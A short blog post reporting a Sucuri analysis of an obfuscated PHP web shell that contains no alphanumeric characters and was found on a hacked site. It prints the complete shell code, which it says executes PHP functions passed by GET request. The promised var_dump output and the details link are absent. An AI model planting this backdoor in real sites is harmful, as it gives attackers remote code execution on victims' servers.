PHP shell without a single alphanumeric character

Yesterday, a curious question appeared on Sucuri’s blog: a site owner, having discovered it was hacked, was quite surprised to find the following malicious code; what exactly is he doing?
@$_[]=@!+_; $__=@${_}>>$_;$_[]=$__;$_[]=@_;$_[((++$__)+($__++ ))].=$_;
$_[]=++$__; $_[]=$_[--$__][$__>>$__];$_[$__].=(($__+$__)+ $_[$__-$__]).($__+$__+$__)+$_[$__-$__];
$_[$__+$__] =($_[$__][$__>>$__]).($_[$__][$__]^$_[$__][($__<<$__)-$__] );
$_[$__+$__] .=($_[$__][($__<<$__)-($__/$__)])^($_[$__][$__] );
$_[$__+$__] .=($_[$__][$__+$__])^$_[$__][($__<<$__)-$__ ];
$_[$__+ $__] ;$_[@-_]($_[@!+_] );

As you can see, the code has neither function calls, nor any alphanumeric character at all.

One of the Sucuri programmers, Yorman Arias, arranged the code in a more readable form and wrapped each line of code in var_dump () to see its output:
As a result, using vague phrases like “some boolean magic” and analyzing the code, I conclude that the purpose of the malware is to execute PHP functions, which are passed to it using a GET request.

Technical details are here .